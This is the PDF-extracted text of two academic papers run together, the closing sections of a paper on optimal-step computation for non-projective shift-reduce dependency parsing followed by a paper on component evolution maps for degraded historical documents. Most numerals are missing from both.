(aj,ai) ∈ tg, if (aj,ai+ ) ∈ tg, or if j is smallest such that there is ` < i with (a`,aj) ∈ tg or (aj,a`) ∈ tg. similarly, score(i,j) would be calculated only if score(i,j′,q) would be calculated and (bj,aj′) ∈ tg, if (bj,ai+ ) ∈ tg, or if j is smallest such that there is ` ≤ i with (a`,bj′) ∈ tg or (bj′,a`) ∈ tg for some j′ such that bj′ an ancestor of bj in the same component. towards constant time per calculation a typical application would calculate the optimal step for several or even all configurations within one computation. between one configuration and the next, the stack differs at most in the two rightmost elements and the remaining input differs at most in that it loses its leftmost element. therefore, all but a constant number of values of score(i,j,q) and score′(i,j) can be reused, to make the time complexity closer to constant time for each calculation of the optimal step. the practical relevance of this is limited however if one would typically reload the data structures containing the relevant values, which are of linear size. hence we have not pursued this further. experiments our experiments were run on a laptop with an intel i - u processor ( cores, . ghz) with gb figure : geometric mean of the number of optimal projectivized trees against sentence length. of ram. the implementation language is java, with dl j for the classifier, realized as a neural network with a single layer of hidden nodes. training is with batch size , and epochs. features are the (gold) parts of speech and length- word vec representations of the word forms of the top-most three stack elements, as well as of the left-most three elements of the remaining input, and the left-most and right-most depen- dency relations in the top-most two stack elements. . optimal projectivization we need to projectivize our training corpus for the experiments in section . , using the algorithm described at the end of section . as we are not aware of literature reporting experiments with optimal projectivization, we briefly describe our findings here. projectivizing all the training sets in universal dependencies v . took sec in total, or . ms per tree. as mentioned earlier, there may be multiple projectivized trees that are optimal in terms of accuracy, for a single gold tree. we are not aware of meaningful criteria that tell us how to choose any particular one of them, and for our experiments in section . we have chosen an arbitrary one. it is conceivable, however, that the choices of the projectivized trees would affect the accuracy of a parser trained on them. figure illustrates the degree of ‘‘choice’’ when projectiving trees. we consider https://deeplearning j.org/. https://universaldependencies.org/. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://deeplearning j.org/ https://universaldependencies.org/ pseudo optimal grc . . de . . ja . . table : accuracy (las or uas, which here are identical) of pseudo-projectivization and of optimal projectivization. two languages that are known to differ widely in the prevalence of non-projectivity, namely ancient greek (proiel) and japanese (bccwj), and we consider one more language, german (gsd), that falls in between (straka et al., ). as can be expected, the degree of choice grows roughly exponentially in sentence length. table shows that pseudo-projectivization is non-optimal. we realized pseudo-projectivization using maltparser . . . . computing the optimal step to investigate the run-time behavior of the algo- rithms, we trained our shift-reduce dependency parser on the german training corpus, after it was projectivized as in section . . in a second pass over the same corpus, the parser followed the steps returned by the trained classifier. for each configuration that was obtained in this way, the running time was recorded of calculating the optimal step, with the non-strict left-before-right strategy. for each configuration, it was verified that the calculated scores, for shift, reduce left, and reduce right, were the same between the three algorithms from sections , , and . the two-pass design was inspired by choi and palmer ( ). we chose this design, rather than online learning, as we found it easiest to imple- ment. goldberg and nivre ( ) discuss the relation between multi-pass and online learning approaches. as figure shows, the running times of the algorithms from sections and grow slowly as the summed length of stack and remaining input grows; note the logarithmic scale. the improvement of the linear-time algorithm over the quadratic-time algorithm is perhaps less than one may expect. this is because the calculation of the critical nodes and the construction of the nec- essary tables, such as p, p′, and r, is considerable compared to the costs of the memoized recursive calls of score and score′. http://www.maltparser.org/. figure : mean running time per step (milliseconds) against length of input, for projectivized and un- projectivized trees. figure : mean k + m′ against k + m. both these algorithms contrast with the algo- rithm from section , applied on projectivized trees as above (hence tagged proj in figure ), and with the remaining input simplified to just its critical nodes. for k + m = , the cubic-time algorithm is slower than the linear-time algorithm by a factor of about . nonetheless, we find that the cubic-time algorithm is practically relevant, even for long sentences. the decreases at roughly k + m = , which are most visible for section (proj), are explained by the fact that the running time is primarily determined by k + m′, where m′ is the number of critical nodes. because k + m is bounded by the sentence length and the stack height k tends to be much less than the sentence length, high values of k + m tend to result from the length m of the remaining input being large, which in turn implies that there will be more non-critical nodes that are removed before the most time-consuming part of the analyses is entered. this is confirmed by figure . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://www.maltparser.org/ ( ) ( ) ( ) ( ) ( ) las uas subset all subset all all sec. sec. sec. de, % . . . . . , . . . . . da, % . . . . . , . . . . . eu, % . . . . . , . . . . . el, % . . . . . , . . . . . cu, % . . . . . , . . . . . got, % . . . . . , . . . . . hu, % . . . . . , . . . . . table : accuracies, with percentage of trees that are non-projective, and number of tokens. only gold computations are considered in a single pass ( , ) or there is a second pass as well ( , , ). the first pass is on the subset of projective trees ( , ) or on all trees after optimal projectivization ( , , ). the second pass is on projectivized trees ( , ) or on unprojectivized trees ( ). the main advantage of the cubic-time algorithm is that it is also applicable if the training corpus has not been projectivized. to explore this we have run this algorithm on the same corpus again, but now without projectivization in the second pass (for training the classifier in the first pass, projec- tivization was done as before). in this case, we can no longer remove non-critical nodes (without it affecting correctness), and now the curve is mono- tone increasing, as shown by section (unproj) in figure . nevertheless, with mean running times below . sec even for input longer than tokens, this algorithm is practically relevant. . accuracy if a corpus is large enough for the parameters of a classifier to be reliably estimated, or if the vast majority of trees is projective, then accuracy is not likely to be much affected by the work in this paper. we therefore also consider six languages that have some of the smallest corpora in ud v . in combination with a relatively large proportion of non-projective trees: danish, basque, greek, old church slanovic, gothic, and hungarian. for these languages, table shows that accuracy is generally higher if training can benefit from all trees. in a few cases, it appears to be slightly better to train directly on non-projective trees rather than on optimally projectivized trees. conclusions we have presented the first algorithm to calculate the optimal step for shift-reduce dependency pars- ing that is applicable on non-projective training corpora. perhaps even more innovative than its functionality is its modular architecture, which im- plies that the same is possible for related kinds of parsing, as long as the set of allowable transitions can be described in terms of a split context-free grammar. the application of the framework to, among others, arc-eager dependency parsing is to be reported elsewhere. we have also shown that calculation of the optimal step is possible in linear time if the train- ing corpus is projective. this is the first time this has been shown for a form of projective, deter- ministic dependency parsing that does not have the property of arc-decomposibility. acknowledgments the author wishes to thank the reviewers for comments and suggestions, which led to substan- tial improvements. references lauriane aufrant, guillaume wisniewski, and françois yvon. . exploiting dynamic ora- cles to train projective dependency parsers on non-projective trees. in conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume , pages – . new orleans, la. jinho d. choi and martha palmer. . getting the most out of transition-based dependency pars- ing. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . portland, or. jason eisner. . bilexical grammars and their cubic-time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilis- tic and other parsing technologies, chapter , pages – . kluwer academic publishers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april jason eisner and giorgio satta. . efficient parsing for bilexical context-free grammars and head automaton grammars. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . maryland. daniel fernández-gonzález and carlos gómez- rodŕıguez. a. a dynamic oracle for linear- time -planar dependency parsing. in conference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies, volume , pages – . new orleans, la. daniel fernández-gonzález and carlos gómez- rodrı́guez. b. non-projective dependency parsing with non-local transitions. in con- ference of the north american chapter of the association for computational linguistics: human language technologies, volume , pages – . new orleans, la. norman fraser. . parsing and dependency grammar. ucl working papers in linguistics, : – . yoav goldberg and joakim nivre. . a dy- namic oracle for arc-eager dependency parsing. in the th international conference on com- putational linguistics, pages – . mumbai. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg, francesco sartorio, and giorgio satta. . a tabular method for dynamic ora- cles in transition-based parsing. transactions of the association for computational linguistics, : – . carlos gómez-rodŕıguez, john carroll, and david weir. . a deductive approach to depen- dency parsing. in th annual meeting of the association for computational linguistics: hu- man language technologies, pages – . columbus, oh. carlos gómez-rodrı́guez and daniel fernández- gonzález. . an efficient dynamic oracle for unrestricted non-projective parsing. in rd annual meeting of the association for compu- tational linguistics and th international joint conference on natural language processing, volume , pages – . beijing. carlos gómez-rodrı́guez, francesco sartorio, and giorgio satta. . a polynomial-time dynamic oracle for non-projective dependency parsing. in conference on empirical methods in natural language processing, proceedings of the conference, pages – . doha. liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in proceedings of the th annual meeting of the association for computational linguistics, pages – . uppsala. mark johnson. . transforming projective bilexical dependency grammars into efficiently- parsable cfgs with unfold-fold. in th annual meeting of the association for com- putational linguistics, proceedings of the con- ference, pages – . prague. sylvain kahane, alexis nasr, and owen rambow. . pseudo-projectivity, a polynomially pars- able non-projective dependency grammar. in th annual meeting of the association for computational linguistics and th interna- tional conference on computational linguis- tics, volume , pages – . montreal. martin kay. . guides and oracles for linear- time parsing. in proceedings of the sixth international workshop on parsing technolo- gies, pages – . trento. marco kuhlmann, carlos gómez-rodrı́guez, and giorgio satta. . dynamic programming algorithms for transition-based dependency pars- ers. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . portland, or. miryam de lhoneux, sara stymne, and joakim nivre. . arc-hybrid non-projective depen- dency parsing with a static-dynamic oracle. in th international conference on parsing technologies, pages – . pisa. alexis nasr. . a formalism and a parser for lexicalised dependency grammars. in fourth international workshop on parsing technolo- gies, pages – . prague and karlovy vary. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april joakim nivre. . algorithms for deterministic incremental dependency parsing. computa- tional linguistics, ( ): – . joakim nivre, johan hall, and jens nilsson. . memory-based dependency parsing. in proceedings of the eighth conference on computational natural language learning, pages – . boston, ma. joakim nivre and jens nilsson. . pseudo- projective dependency parsing. in rd annual meeting of the association for computational linguistics, proceedings of the conference, pages – . ann arbor, mi. peng qi and christopher d. manning. . arc-swift: a novel transition system for depen- dency parsing. in th annual meeting of the association for computational linguistics, proceedings of the conference, volume , pages – . vancouver. milan straka, jan hajič, jana straková, and jan hajič, jr. . parsing universal dependency treebanks using neural networks and search- based oracle. in proceedings of the fourteenth international workshop on treebanks and linguistic theories, pages – . warsaw. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in th international workshop on parsing technologies, pages – . loria, nancy. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction preliminaries tabular dependency parsing o(n )- . time algorithm o(n - . ) time algorithm o(n)- . time algorithm towards constant time per calculation experiments optimal projectivization computing the optimal step accuracy conclusions evolution maps and applications submitted april accepted november published january corresponding author ofer biller, billero@cs.bgu.ac.il academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright biller et al. distributed under creative commons cc-by . open access evolution maps and applications ofer biller , irina rabaev , klara kedem , its’hak dinstein and jihad j. el-sana department of computer science, ben-guion university of the negev, beer-sheva, israel electrical and computer engineering department, ben-guion university of the negev, beer-sheva, israel abstract common tasks in document analysis, such as binarization, line extraction etc., are still considered difficult for highly degraded text documents. having reliable fundamental information regarding the characters of the document, such as the distribution of character dimensions and stroke width, can significantly improve the performance of these tasks. we introduce a novel perspective of the image data which maps the evolution of connected components along the change in gray scale threshold. the maps reveal significant information about the sets of elements in the document, such as characters, noise, stains, and words. the information is further employed to improve state of the art binarization algorithm, and achieve automat- ically character size estimation, line extraction, stroke width estimation, and feature distribution analysis, all of which are hard tasks for highly degraded documents. subjects computer vision, digital libraries keywords text document analysis, historical documents, degraded documents, connected component analysis introduction in recent years there has been a growing effort to digitize historical documents. due to advanced technology, a high quality acquisition of large collections of documents became practical, saving them from physical decay. many algorithms are being developed in order to extract information out of these documents, which are too numerous to analyze manually. however, some of these documents are severely degraded, and therefore do not provide acceptable performance when processed using common methods. in our work, we provide a novel perspective on text documents which reveals key information about the various elements of the document such as letters, connected letters, noise, and stains. the extracted information can be used by higher level algorithms to significantly improve their performance. various algorithms such as binarization, segmentation, word spotting, and recognition often require preliminary information such as character dimensions, stroke width, and noise characteristics of the input document. when dealing with severely degraded documents, this information is essential but is hard to obtain automatically. less degraded documents parameters, such as stroke width and character size, are often obtained with relative accuracy by using a binarized version of the document (roy et al., ; wen & ding, ; raju, pati & ramakrishnan, a). the binarization of degraded documents, however, is not reliable as it may introduce how to cite this article biller et al. ( ), evolution maps and applications. peerj comput. sci. :e ; doi . /peerj-cs. mailto:billero@cs.bgu.ac.il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. noise, falsely merged components, and other artifacts. for many algorithms, information regarding character dimensions is often expected to be provided by the user or determined in an ad-hoc manner (new et al., ; bar-yosef et al., ). our method copes with severe degradations and non-uniform backgrounds. in this paper, we introduce the component evolution maps, and demonstrate some of their applications. we use these maps to estimate letter dimensions and stroke width in degraded documents. we then utilize this information to improve state-of-the-art bina- rization, line segmentation, and characterizing feature behavior in a document collection. for a given property of the connected components in a document, the evolution maps demonstrate the evolution of the histogram of the property, along with the change in the intensity threshold. to simplify the discussion, we start explaining the evolution map of the component’s width property. for example, fig. shows the distribution of the width of the connected components for each possible intensity threshold. the y-axis represents the intensity level, the x-axis represents width, and the z-axis (color) represents the density of the components for each width in the given threshold: warm (red, orange, yellow, etc.)—high density, cold (blue, cyan, etc.)—low (this is the color coding of all the maps depicted in the figures in the paper). since the map represents a text document, we expect to see high density in the range of character width and within the range of intensity thresholds that separates the characters from the background. the histogram in fig. shows a blob centered around a width of pixels, ranging over gray levels approximately from to . this blob represents the characters in the document. the noise, on the other hand, concentrates along the y-axis, and is depicted as a large number of low width connected components in a wide range of gray scale thresholds. in our research we deal with severely degraded documents, where state-of-the-art document analysis algorithms, such as binarization and line extraction, provide poor results. a good example of such text documents are those from the cairo genizah. the cairo genizah is a collection of documents, most of them in handwritten hebrew square letters, which where hidden in an attic of a synagogue in cairo, egypt for several hundreds of years. the genizah collection contains hundreds of thousands of documents dated starting from the ninth century. the documents are characterized by different handwriting styles, document and letter sizes, and materials. most documents are only textual, each document contains a single writing style with no titles, and many of them are severely degraded. the main motivation in this research is to provide a solid starting point for processing severely degraded historical documents. in the rest of this paper we briefly overview related work, then describe in detail the component evolution maps, their construction and initial analysis (‘evolution maps’). in ‘applications’ we demonstrate several applications for component evolution maps. finally, in ‘summary,’ we conclude our work and draw directions for future research. related work connected component analysis has attracted the interest of researchers, and intensive research was performed on document layout segmentation and text separation for biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a document image, and the distribution of connected components along their width prop- erty (x-axis), for each possible gray scale threshold (y-axis). the z-axis is expressed by color where warm (cold) colors represent high (low) density of components. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. binarized document images (jain & zhong, ; raju, pati & ramakrishnan, b; zagoris & papamarko, ; bukhari et al., ). pikaz & averbuch ( ) selected a threshold for text document by scanning the entire gray scale range, thresholding the image with each value, looking for the widest sub range of gray scale for which the number of the connected components remains stable. this method may be viewed as a special case of our approach. the component tree is a graph representation computed from the cross-section decomposition of the gray levels of the image (mosorov & kowalski, ), and uses connected components of cross-sections at gray level of the image to assemble different perspectives of the image data. the component tree applies operators on a single component level for image segmentation (de carvalho et al., ) and for document binarization (naegel & wendling, ). similarly, the maximally stable extremal regions (mser) descriptor (pajdla et al., ) finds extremal regions which maximize stability over threshold change, and is used mostly for object recognition. most of these works analyze the change of thresholds in order to achieve local information such as local adaptive binarization, segmenting or locating objects in an image. in our work, we map connected component information for a range of different thresholds over the whole document in order to extract global information about the document and its elements. evolution maps we offer a novel perspective of the image data which reflects the evolution of connected components along the change in gray scale threshold. we term it as component evolution maps (cem). cem brings to the surface underlying information about the sets of elements (e.g., letters, noise, connected letters) in the document image. below we discuss in detail the construction of the evolution maps followed by their analysis. definition of the evolution map the evolution map is a function of the intensity (i) and a property (p) of the connected components of the image into the occurrence level of this property in the image, i.e., map : i × p −→ r, where i is the intensity, p is an image property, and r is the occurrence (detailed below). for example, the width cem, map(g,w), is the number of connected components of width w in pixels, when thresholding the image at intensity g. to simplify the discussion, we refer in this section only to the width cem. the cem provides an intuitive visualization tool to analyze the distribution of an image property. figure represents the width cem for a text document image, where ‘hot’ colors represent high density of components. the horizontal cross-section at gray scale value g (y-axis) represents the histogram of the components’ widths in the image binarized using g as a threshold. figure shows three cross-sections at different intensity thresholds, and the corresponding binary images. in fig. we illustrate a cross-section as histogram of component width for a specific threshold, and the corresponding components in the document for two ranges of width (see the squares on the graph). biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure horizontal cross-section of the width cem and the corresponding binary images. construction of the evolution map we construct the evolution map in a straightforward manner by thresholding the image over gray levels, and counting the number of resulting connected components for each width in the binary image. since noise usually produces a vast number of small components and skews the histogram, we accumulate the relative total area of the components, which is defined as the area of the components normalized by the size of the whole image. this value is less sensitive to noise than component count, as shown in fig. . as seen, the red blob on the top illustration emphasizes the noise, and the bottom illustration highlights the width of the sought elements. we store both the values count and the relative total area, and use each of them in different applications as detailed below. we smooth the cem using a d gaussian kernel to reduce the influence of local irregularities. constructing the cem, for one or few properties, is relatively straight forward and fast. for example, computing the cems of properties for a document of resolution , × , took about . s on a standard desktop. analysis of the cem some sets of elements in the gray scale documents (noise, characters, connected characters, etc.) have values of the mapped property which are distributed within a given range. sets which are dominant in the document will form a blob of local maximum on the map. the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a horizontal cross-section of the densities in the width cem at one gray level value. the squares on the graph depict the most popular widths for this intensity value. the images of components corresponding to the squares are pointed to by the arrows. characteristics of the local maximum and its surroundings describe attributes of the set of objects. due to the statistical nature of the map, it tends to be robust against various defects of the image such as blurriness, local degradations and deformations. figure shows a document with its width cem. images a–e show the set of elements in the original image corresponding to the blobs a–e in the cem. blob a represents a set of noise stains in the document, which appear on relatively high range of threshold values and low width values (indicating small components). the dominance of blob b is supported by the existence of single character elements that occupy a substantial area of the image. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) displays the count of components per threshold and width, and (b) shows the relative total area of components per threshold and width. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a document image with its components according to the width evolution map. the images (a, b, c, d, e), display the components represented by each of the blobs, marked on the map by (a, b, c, d, e). the blobs c, d, and e, are at high width values and represent objects of two, three, and four connected letters, respectively. to extract the information found in the cem, we look for the main blobs in the map, and model each of them by an anisotropic gaussian. first, to determine the top blob centroids, we use a sweeping plane that moves downward along the z-axis. as the plane descends, it encounters the peaks of the blobs, one by one. neighboring blobs expand until they touch each other, or reach a low value below a predefined threshold. we use the data of the peaks and their immediate neighborhood to create an anisotropic gaussian model for each blob. we fit a quadratic surface to the log of the data from the map using the least squares method. we obtain the gaussian characteristics using the coefficients of the fitted quadratic surface. given a blob on the map and it’s gaussian modeling, we can obtain an estimation for the distribution of the property values for the elements represented by the blob. in the width example, we receive distribution of the width of elements represented by each blob. in order to receive some hard limits on the values of the property values for the elements in the group, we should apply some threshold on the given distribution (e.g., times the standard deviation). biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the original width cem (a), and its modeling by anisotropic gaussians (b). gaussian modeling was validated as suitable for the cem blobs by examining the data and verifying that the blob distribution is very close to normal distribution. using gaussians to model the blobs provides a concise and simplified representation, and handles blob intersection appropriately. it also provides the probability that an element belongs to the set represented by a certain blob. using gaussian mixture model was examined as an alternative option, but was found this to be less effective since the mixture model, using expectation maximization, tends to capture small components, while we prefer to ignore small components and model the leading salient blobs more accurately. figure shows a width cem and its simplified modeling using the topmost gaussians. applications in this section we demonstrate some applications of cems for several document analysis tasks. we robustly estimate the character dimensions and stroke width on degraded documents. this information is then used by many document analysis algorithms to improve their performance and reduce the need for manual adjustments of predefined parameters. we demonstrate utilization of this information to improve state of the art binarization method and simplify line segmentation of degraded documents. finally, we show how the cems is used for exploring feature behavior in text documents. in order to evaluate the performance of these tasks we had to manually generate ground truth for each task (character dimensions, line segmentation, and stroke width). for each task, we randomly selected a subset of the documents from the collection and generated the ground truth relevant for the task. estimation of character dimensions one of the salient elements in a cem of a text document is the blob which represents the documents’ characters. to determine the blob that represents the document’s characters, we consider the top blobs and grade them according to the following features. we define biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the components of a blob b as as the set of connected components corresponding to the points (g,w) of b, and the cardinality of the blob b as the number of connected components represented by b. let p be the percentage of the image area occupied by all the components in the blob b, and let n denote the total number of components in b. equation ( ) formulates the score of of the blob b. score = (a · p) × + exp(−c · (n − c )) . ( ) the exponential term in the denominator, parametrized by the given constants c and c , suppresses the score of blobs with small number of components. the blobs with the highest score from both width and height cems represent the width and height of the letters in the input image. we also take into account the agreement level between the selected blobs from the width and the height cems– the two blobs should have a similar mean and standard deviation on the y-axis (intensity) projection. the same experiment was conducted also for other properties, such as the component’s diagonal and the projection of the component on its main principal axis. these maps provide correct estimates of the character dimensions in most cases, but are less accurate than the estimate obtained by width and height evolution maps. we applied our method on a collection of digitized historical documents from the cairo genizah. we ran our algorithm on a set of hundred documents (selected randomly) with various degradation levels, resolutions and character dimensions. we created width and height cems for each document, and estimated the width and height ranges of the characters in each document. for these documents, we have created ground truth (using biller et al., ) which includes bounding boxes of the letters. to measure the accuracy of our results, we calculated the precision, recall, and f-measure of our estimate with respect to the ground truth. figure shows the width cem for a specific document. displayed in black over it is a histogram of the ground truth widths. our estimate of character width is marked by a white rectangle. we calculated the recall as the percentage of letters from the ground truth which fit in our width estimate. the precision is calculated as the ratio between the overlap of our width estimate with the ground truth and the range of our width estimate. our method achieves accuracy of . % (f-measure) with respect to the provided ground truth. improving binarization methods in this section, we demonstrate improving the results of a binarization algorithm by using cem to estimate character dimension. we use the winning algorithm in the h-dibco- binarization contest (pratikakis, gatos & ntirogiannis, ) proposed by bar-yosef et al. ( ). this binarization algorithm is based on the sliding window approach. the window size is configurable, and the authors recommend it to be around one and a half times the letter size. first we ran the binarization algorithm with a default window size (fig. a). then, we ran the same binarization algorithm using a window size of one and a half times the maximum of the width and height of the characters in the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure utilizing our estimation to improve binarization algorithm. (a) binarization using default window size. (b) binarization with optimized window size using the output of the cem. (c) result after filtering out-of-range components, using the estimate of character dimension, given by the cem. figure the width cem of a document’s image. displayed in black on the cem is the histogram of the ground truth of widths for the letters (the height of the black line represents the count). the white rectangle shows the estimate of the width range of the characters, made by our algorithm. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure line detection results of the algorithm. the elements that belong to the same line have the same color. the segmentation borders are shown as blue curves. document obtained by cem (fig. b). as an additional improvement of the binarization, we filter out all components of the binarized image which substantially exceed the range of character dimensions (fig. c). we applied our method on seventy degraded documents from the genizah collection, and observed a substantial improvement in the quality of the results compared with the bar-yosef algorithm with default parameters. to quantify the improvement we randomly selected five documents, manually generated a ground truth of binarization for each, and measured the performance of the two binarization methods against the ground truth. the proposed method achieved an average f-measure of . % (with average percision of . % and average recall of . %) while the original algorithm achived . % (with average percision of . % and average recall of . %). line segmentation of degraded documents in this section, we demonstrate utilizing cem for text line detection in gray scale images of highly degraded historical documents. using the information obtained from the cem, we identify components which are likely to be characters of the documents. we take into account their width, height, and range of thresholds in which they are received. the set of identified elements does not have to include all the characters present in the document. nevertheless, the identified elements represent most of the characters in the document, which allows detecting text lines in the degraded document, as described below. the detected potential characters are accumulated into lines using a sweeping line approach. a vertical sweeping line moves across the image in the direction of writing. when the sweeping line encounters an element, the algorithm determines whether to assign this element to one of the already discovered text lines, or to initiate a new line. full details of the algorithm can be found in rabaev et al. ( ). the final result of the text line detection is illustrated in fig. . elements that belong to the same line have the same color. the segmentation borders are shown in blue. to evaluate the performance of the algorithm, we employed the evaluation strategy used in the icdar handwriting segmentation contest (gatos, stamatopoulos & louloudis, ). two values, detection rate (dr) and recognition accuracy (ra), are calculated. the detection rate and recognition accuracy are based on the number of matches between the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. line regions detected by the algorithm and the line regions in the ground truth, and are calculated as follows: dr = o o n , ra = o o m , where n and m are the number of text lines in the ground truth and the number of text lines detected by the algorithm, respectively, and o o is the number of one-to-one matches. a measure that combines detection rate and recognition accuracy is the performance metric fm: fm = × dr × ra dr + ra . the algorithm was applied to extremely degraded document from cairo genizah collection. the results averaged over these documents are dr = . , ra = . , and fm = . . taking into consideration that the tested documents are torn, stained and highly damaged, the results are very encouraging. in addition, the presented method does not require any preprocessing step, e.g., noise reduction or text zone location. to test the applicability of the proposed approach to non hebrew documents, we used saint gall and parzival databases. the saint gall database (presented in fischer et al. ( ) and garz et al. ( )) contains pages of a latin manuscript from the th century written by single writer. the parzival database, described in fischer et al. ( ), contains pages of a german manuscript from the th century written by three writers. the results of applying our algorithms are dr = . , ra = . , and fm = . on saint gall database, and dr = . , ra = . , and fm = . on parzival database. (garz et al. ( ) used slightly dierent evaluation criteria. without getting into details, our result for the saint gall dataset using their evaluation criteria is line accuracy . , while the result of garz et al. is . . as can be seen, the results are very similar). in addition, we have applied the algorithm of asi, saabni & el-sana ( ) on the cairo genizah dataset. while the algorithm in asi, saabni & el-sana ( ) had been reported to achieve excellent results for documents of reasonable quality, it gave meaningless results on our extremely degraded dataset. stroke width estimation another application for utilizing evolution maps is evaluation of the range of stroke width in degraded documents. many binarization methods use the stroke width as part of the binarization process (e.g., su, lu & tan, ; liu & srihari, ; rivest-hénault, moghaddam & cheriet, ; badekas and papamarkos, ; ntirogiannis, gatos & pratikakis, ). in extremely degraded documents, calculating the stroke width is hard and is highly influenced by noise and stains. the stroke width evolution map provides a statistical and comprehensive overview of the range of stroke widths revealed by the range of intensity thresholds. to estimate the stroke width for a component, we first compute the component’s distance transform, starting from the boundary of the component. we compute the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure let a be the stroke width. the maximal values the distance transform of the component achieves are around a/ . the average therefore can be used as an estimate for a/ . average of the distance transform values inside the component and multiply it by four to receive an estimate for the average stroke width (see illustration in fig. ). a stroke width is consistent if it does not change much within the component. we compute a consistency factor for the stroke within of the component, using the standard deviation of the histogram of the component’s distance transform. for each component we multiply its area by the stroke width consistency factor, so components with consistent stroke width will have a higher weight. in the cem, we depict for each stroke width and intensity the sum of the weighted component areas. we select the most salient blob on the map using techniques described earlier, and use the gaussian fit of that blob as an estimate of the stroke width. in fig. we show an example document with its stroke width evolution map. in the map, the selected blob is marked with a white boundary. the estimated range of stroke widths is illustrated on the top left of the document using red lines. the left and rightmost lines are the range boundaries and the middle line shows the average stroke width detected. to evaluate this method, we took fifteen degraded historical documents from the cairo genizah and sampled the stroke width manually in several random characters in the document. over . % of the samples across the documents where within the range of the estimate. analysis of feature distribution in documents in many applications of document analysis, one of the first steps is looking for suitable features. the evolution maps provide a convenient tool for exploring and visualizing the behavior of different features in a given document. using the maps, one can explore each feature, the distribution of its values, and view the elements of the document corresponding to different value ranges of that feature. based on the cem, we developed an interactive tool which enables flexible generation and exploration of evolution maps per property, which we call the evolution map explorer. the user can interactively examine the maps, adjust the maps’ display by setting properties for each map, and explore the maps. the user defines an area on the cem with the mouse biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) a document and (b) its stroke width evolution map. the selected blob on the map (marked with a white border) is used to estimate the stroke width of letters in the document. the estimate is marked by red vertical lines over the document image. the leftmost and the rightmost lines are the range boundaries and the middle line shows the average stroke width detected. (see, e.g., the black rectangle in the cem in fig. ), and the system marks on the image of the document the elements corresponding to the rectangle, and displays information about the selection, e.g., the range of intensities, range of property values, and the count of elements relevant for this selection. for example we picked a document and the feature “transition average.” our tool created the evolution map, shown in fig. . in this evolution map, the x axis represents the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a general overview of the application. the four presented evolution maps are the width, principal direction, height and transition number average. the rectangle in the height cem corresponds to the letters in the document on the left of the figure, whose heights and intensities correspond to the values in the rectangle. average number of transitions from background to foreground for a connected component (averaging over the rows and columns of the component). the figure shows, for each selected rectangle on the cem, the document and the elements corresponding to this rectangle. the leftmost rectangle represents noise elements which have average transition values around . the middle rectangle represents sets of characters with average transition values ranging from . to . . the rightmost rectangle represents elements including more than one connected character with average transition values from . to . . one can observe on the cem (fig. ) a number of peaks which distinguish between characters with high average transition count and low one. by selecting different rectangles within this area, the user can explore the distribution of the different letters corresponding to the ex- amined feature, and estimate the feature’s ability to discriminate between different letters. summary in this work we introduced component evolution map which maps the evolution of a property of the connected components along the change in gray scale intensity level. we have demonstrated the contribution and potential of cem in several tasks: estimating letter dimensions, improving a state of the art binarization algorithm, performing biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the evolution map of transition average for a document. three selections of peek ranges (marked by black rectangles) in the evolution map, for each selection the elements corresponding to the selection are marked over the document. the leftmost range include transition values around , the middle selection contains transition values from . to . , and the rightmost values between . to . . line segmentation in degraded documents, stroke width estimation, and analysis of feature distribution in text documents. this method is applicable for a wide range of text documents, and is especially capable of dealing with highly degraded and noisy documents. we see in the cem method potential for contribution in different directions in the document analysis field. we plan to continue looking for different ways to exploit 